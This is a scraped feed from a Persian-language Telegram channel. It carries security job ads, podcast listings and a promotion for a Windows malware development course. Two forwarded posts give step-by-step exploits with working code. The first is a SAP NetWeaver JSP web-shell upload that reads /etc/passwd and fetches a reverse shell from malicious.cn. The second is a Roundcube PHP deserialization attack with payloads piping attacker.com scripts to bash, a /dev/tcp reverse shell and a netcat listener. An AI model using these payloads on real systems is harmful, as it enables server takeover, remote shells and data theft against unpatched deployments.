Channel: فرصتهای شغلی شبکه و امنیت
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from لیان - آموزش امنیت و تستنفوذ
Media is too big
VIEW IN TELEGRAM
https://youtu.be/BTN4G622zZA
https://www.aparat.com/v/kbk79k9
Please open Telegram to view this post
VIEW IN TELEGRAM
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from لیان - آموزش امنیت و تستنفوذ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from لیان - آموزش امنیت و تستنفوذ
Please open Telegram to view this post
VIEW IN TELEGRAM
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Warfar
این endpoint به راحتی فایل رو با متد POST دریافت و روی سیستم ذخیره میکنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود میکنه و روی سرور اجرا میکنه!
POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary
--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--
http://target-victim.com/VCService/shell.jsp?cmd=whoami
و تمام! کد روی سرور اجرا میشه.
curl -X POST http://victim.com/developmentserver/metadatauploader \
-F "[email protected]" -H "Content-Type: multipart/form-data"
محتوای shell.jsp:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
out.println(line);
}
%>
curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبکتر و stealthتره.
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود میکنه:
<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفتهست:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from لیان - آموزش امنیت و تستنفوذ
#شروع_قطعی
☄️ دوره Windows Malware Development
👈 شروع دوره: پنجشنبه، 25 اردیبهشت 1404
👈 با تدریس: جناب مهندس بهاروندی
☺️ مشاهده جزئیات دوره و خرید:
https://liangroup.net/academy/red-teaming/Windows-Malware-Development
💠 ارائه مدرک معتبر در انتهای دوره
💠 ارائه فیلمهای رکورد شده هر جلسه
💠 مشاوره رایگان
🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram
💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
https://liangroup.net/academy/red-teaming/Windows-Malware-Development
💻 گروه لیان
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from لیان - آموزش امنیت و تستنفوذ
https://youtu.be/59rSbyFsKZg
https://youtu.be/XRAa4eKv5vw
https://liangroup.net/academy/red-teaming/Windows-Malware-Development
💻 گروه لیان
Please open Telegram to view this post
VIEW IN TELEGRAM
اپیزود 85 رادیو امنیت - پگاسوس و دنیای تاریک جاسوسی
LianGroup.net
#پادکست
🎤 اپیزود 85 رادیو امنیت - پگاسوس و دنیای تاریک جاسوسی - سیام اردیبهشت 1404
💠 موضوعات این قسمت:
00:14 مقدمه
02:28 هک پنل مدیریتی باجافزار LockBit و افشای جزئیات داخلی
11:28 جریمه 530 میلیون یورویی تیکتاک به دلیل نقض GDPR
16:43 انتشار بدافزار Noodlophile توسط تولیدکنندههای جعلی ویدئوی هوش مصنوعی
29:00 سواستفاده از آسیبپذیری زیرودی MDaemon توسط گروه APT28
40:54 جریمه 168میلیون یورویی گروه NSO (سازنده بدافزار پگاسوس)
50:37 انتشار نسخه چهارم OtterCookie با قابلیتهای جدید
⬅️ لینک CastBox
https://lian.ac/BrZ
⬅️ مشاهده ایپزودهای قبلی:
https://liangroup.net/home/podcast
تغییرات زیادی از این قسمت تو برنامه رادیو امنیت (سیفکست) بوجود اومده. منتظر نقطه نظرات شما هستیم.
🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram
💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
00:14 مقدمه
02:28 هک پنل مدیریتی باجافزار LockBit و افشای جزئیات داخلی
11:28 جریمه 530 میلیون یورویی تیکتاک به دلیل نقض GDPR
16:43 انتشار بدافزار Noodlophile توسط تولیدکنندههای جعلی ویدئوی هوش مصنوعی
29:00 سواستفاده از آسیبپذیری زیرودی MDaemon توسط گروه APT28
40:54 جریمه 168میلیون یورویی گروه NSO (سازنده بدافزار پگاسوس)
50:37 انتشار نسخه چهارم OtterCookie با قابلیتهای جدید
https://lian.ac/BrZ
https://liangroup.net/home/podcast
تغییرات زیادی از این قسمت تو برنامه رادیو امنیت (سیفکست) بوجود اومده. منتظر نقطه نظرات شما هستیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
رادیو امنیت اپیزود 86 - هکر مصنوعی؛ شکارگر کرنل
LianGroup.net
#پادکست
🎤 اپیزود 86 رادیو امنیت - هکر مصنوعی؛ شکارگر کرنل - هفتم خرداد 1404
💠 موضوعات این قسمت:
00:14 مقدمه
04:36 آسیبپذیری بحرانی در Windows Server 2025
15:51 کمپین جدید و پیشرفتهی بدافزاری
29:13 کمپین جاسوسی APT28 علیه زیرساختهای حیاتی در اروپا و آمریکا
42:20 هکر مصنوعی؛ شکارگر کرنل
⬅️ لینک CastBox
https://lian.ac/VWJ
⬅️ مطالعه بیشتر:
https://liangroup.net/blog/microsoft-outlook-cve-2023-23397/
⬅️ مشاهده ایپزودهای قبلی:
https://liangroup.net/home/podcast
🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram
💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
00:14 مقدمه
04:36 آسیبپذیری بحرانی در Windows Server 2025
15:51 کمپین جدید و پیشرفتهی بدافزاری
29:13 کمپین جاسوسی APT28 علیه زیرساختهای حیاتی در اروپا و آمریکا
42:20 هکر مصنوعی؛ شکارگر کرنل
https://lian.ac/VWJ
https://liangroup.net/blog/microsoft-outlook-cve-2023-23397/
https://liangroup.net/home/podcast
Please open Telegram to view this post
VIEW IN TELEGRAM
کارشناس تست نفوذ موبایل
ما در داتین بهدنبال همکاری با توانایی برقراری ارتباط موثر هستیم تا در نقش کارشناس تست نفوذ موبایل امور امنیت و تداوم کسب و کار ما را همراهی کند. کارشناس تست نفوذ موبایل در داتین با پذیرفتن مسوولیتهای زیر به پیشبرد اهداف تیم کمک میکند:
به عنوان متخصص تست نفوذ موبایل، شما مسئول شناسایی و ارزیابی آسیبپذیریها و مشکلات امنیتی در اپلیکیشنهای موبایل، به ویژه اپلیکیشنهای اندروید، خواهید بود. شما باید توانایی تحلیل و شبیهسازی حملات مختلف را برای شناسایی آسیبپذیریها و خطرات احتمالی داشته باشید. هدف اصلی شما بهبود امنیت و اطمینان از ایمنی دادههای کاربران در برابر تهدیدات مختلف است.
برای انجام بهتر این وظایف دانش و مهارتهای زیر نیاز است:
بررسی و ارزیابی امنیت اپلیکیشنهای موبایل در برابر حملات مختلف.
تهیه گزارشهای مفصل در مورد یافتهها و پیشنهادات اصلاحی برای تیمهای توسعه.
همکاری نزدیک با تیمهای توسعه برای اصلاح آسیبپذیریها و مشکلات امنیتی.
همکاران ما در این موقعیت شغلی لازم است آشنایی با ابزارهای تست نفوذ موبایل مانند Burp Suite، Frida، Drozer و دیگر ابزارهای مشابه.
تسلط بر سیستمعامل اندروید و نحوه عملکرد آن.
آشنایی با تکنیکهای رمزنگاری و امنیت دادهها در موبایل.
تجربه با ابزارهای تحلیل معکوس (Reverse Engineering) مانند jadx و apktool.
توانایی شبیهسازی و شناسایی آسیبپذیریهای مختلف موبایلی و تدوین گزارشات دقیق.
تسلط به زبانهای برنامهنویسی مرتبط با اندروید مانند Java، Kotlin و یا اسکریپتنویسی در پایتون یا Bash.
توانایی انجام تستهای امنیتی در محیطهای مختلف (تست روی دستگاههای فیزیکی، شبیهسازیها و محیطهای مجازی)
نکات حائز اهمیت:
تسلط بر تست نفوذ اپلیکیشنهای iOS و آشنایی با چالشهای امنیتی مخصوص این سیستمعامل مزیت محسوب میشود.
تسلط بر چارچوبهای امنیتی مانند OWASP Mobile Security Testing Guide MSTG.
شرایط احراز شغل
سن: تا 32 سال
جنسیت: تفاوتی ندارد
نرم افزارها:
Kotlin متوسط
Java متوسط
Python متوسط
ShellScript متوسط
ارسال رزومه به:
[email protected]
@LianJob | Jump To Your Office
ما در داتین بهدنبال همکاری با توانایی برقراری ارتباط موثر هستیم تا در نقش کارشناس تست نفوذ موبایل امور امنیت و تداوم کسب و کار ما را همراهی کند. کارشناس تست نفوذ موبایل در داتین با پذیرفتن مسوولیتهای زیر به پیشبرد اهداف تیم کمک میکند:
به عنوان متخصص تست نفوذ موبایل، شما مسئول شناسایی و ارزیابی آسیبپذیریها و مشکلات امنیتی در اپلیکیشنهای موبایل، به ویژه اپلیکیشنهای اندروید، خواهید بود. شما باید توانایی تحلیل و شبیهسازی حملات مختلف را برای شناسایی آسیبپذیریها و خطرات احتمالی داشته باشید. هدف اصلی شما بهبود امنیت و اطمینان از ایمنی دادههای کاربران در برابر تهدیدات مختلف است.
برای انجام بهتر این وظایف دانش و مهارتهای زیر نیاز است:
بررسی و ارزیابی امنیت اپلیکیشنهای موبایل در برابر حملات مختلف.
تهیه گزارشهای مفصل در مورد یافتهها و پیشنهادات اصلاحی برای تیمهای توسعه.
همکاری نزدیک با تیمهای توسعه برای اصلاح آسیبپذیریها و مشکلات امنیتی.
همکاران ما در این موقعیت شغلی لازم است آشنایی با ابزارهای تست نفوذ موبایل مانند Burp Suite، Frida، Drozer و دیگر ابزارهای مشابه.
تسلط بر سیستمعامل اندروید و نحوه عملکرد آن.
آشنایی با تکنیکهای رمزنگاری و امنیت دادهها در موبایل.
تجربه با ابزارهای تحلیل معکوس (Reverse Engineering) مانند jadx و apktool.
توانایی شبیهسازی و شناسایی آسیبپذیریهای مختلف موبایلی و تدوین گزارشات دقیق.
تسلط به زبانهای برنامهنویسی مرتبط با اندروید مانند Java، Kotlin و یا اسکریپتنویسی در پایتون یا Bash.
توانایی انجام تستهای امنیتی در محیطهای مختلف (تست روی دستگاههای فیزیکی، شبیهسازیها و محیطهای مجازی)
نکات حائز اهمیت:
تسلط بر تست نفوذ اپلیکیشنهای iOS و آشنایی با چالشهای امنیتی مخصوص این سیستمعامل مزیت محسوب میشود.
تسلط بر چارچوبهای امنیتی مانند OWASP Mobile Security Testing Guide MSTG.
شرایط احراز شغل
سن: تا 32 سال
جنسیت: تفاوتی ندارد
نرم افزارها:
Kotlin متوسط
Java متوسط
Python متوسط
ShellScript متوسط
ارسال رزومه به:
[email protected]
@LianJob | Jump To Your Office
Forwarded from لیان - آموزش امنیت و تستنفوذ
Please open Telegram to view this post
VIEW IN TELEGRAM
[email protected]
@LianJob | Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Warfar
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حسابهای کاربری معتبر و دسترسی از طریق اینترنت است.
$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]
$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">
از اونجایی که آسیبپذیری بعد از احراز هویت عمل میکنه، نیاز به یه حساب داریم:
Username: [email protected]
Password: Company2023!
/program/actions/settings/upload.php
پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize میشه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا میکنیم.
class Exploit {
public $cmd;
function __destruct() {
system($this->cmd);
}
}
$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);
O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}
POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID
Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...
------XYZ
Content-Disposition: form-data; name="_from"
O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain
(fake content)
------XYZ--
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -lvnp 4444
Please open Telegram to view this post
VIEW IN TELEGRAM
HTML Embed Code: